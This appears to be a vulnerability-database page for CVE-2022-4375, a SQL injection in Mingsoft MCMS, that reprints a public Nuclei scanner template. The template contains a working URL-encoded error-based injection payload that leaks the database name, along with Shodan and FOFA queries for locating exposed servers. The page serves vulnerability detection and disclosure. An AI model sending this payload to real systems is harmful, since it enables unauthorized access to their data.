CVE-2022-4375: Mingsoft MCMS - SQL Injection

日期: 2025-08-01 | 影响软件: Mingsoft MCMS | POC: 已公开

漏洞描述

SQL injection vulnerability in Mingsoft MCMS up to 5.2.9 via the sqlWhere parameter in /cms/category/list.

PoC代码[已公开]

id: CVE-2022-4375

info:
  name: Mingsoft MCMS - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    SQL injection vulnerability in Mingsoft MCMS up to 5.2.9 via the sqlWhere parameter in /cms/category/list.
  impact: |
    Successful exploitation could lead to unauthorized access to sensitive data.
  remediation: |
    Apply the vendor-supplied patch or update to the latest version.
  reference:
    - https://gitee.com/mingSoft/MCMS/issues/I61TG5
    - https://nvd.nist.gov/vuln/detail/CVE-2022-4375
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-4375
    cwe-id: CWE-89,CWE-707
    epss-score: 0.46103
    epss-percentile: 0.97572
    cpe: cpe:2.3:a:mingsoft:mcms:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: mingsoft
    product: mcms
    shodan-query: http.favicon.hash:1464851260
    fofa-query: icon_hash="1464851260"
  tags: cve,cve2022,mingsoft,mcms,sqli

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        words:
          - "mingsoft.net"
        internal: true

  - raw:
      - |
        POST /cms/category/list? HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        sqlWhere=%5b%7b%22%61%63%74%69%6f%6e%22%3a%22%22%2c%22%66%69%65%6c%64%22%3a%22%65%78%74%72%61%63%74%76%61%6c%75%65%28%30%78%37%65%2c%63%6f%6e%63%61%74%28%30%78%37%65%2c%28%64%61%74%61%62%61%73%65%28%29%29%29%29%22%2c%22%65%6c%22%3a%22%65%71%22%2c%22%6d%6f%64%65%6c%22%3a%22%63%6f%6e%74%65%6e%74%54%69%74%6c%65%22%2c%22%6e%61%6d%65%22%3a%22%e6%96%87%e7%ab%a0%e6%a0%87%e9%a2%98%22%2c%22%74%79%70%65%22%3a%22%69%6e%70%75%74%22%2c%22%76%61%6c%75%65%22%3a%22%61%22%7d%5d

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "java.sql.SQLSyntaxErrorException"
          - "java.sql.SQLException"
        condition: or

      - type: word
        part: body
        words:
          - "Icategorydao.xml"
          - "cms_category"
        condition: or

      - type: status
        status:
          - 500
          - 200
# digest: 4a0a00473045022013ba120ff45ee1352fc46a3125441913cc4e3f499f932a68fedfc6ed5ed2f923022100f77f049c37c84ce216a8bb7df55ba2aa1780e95e69eb34becb1015633b6cf991:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2022/CVE-2022-4375.yaml

相关漏洞推荐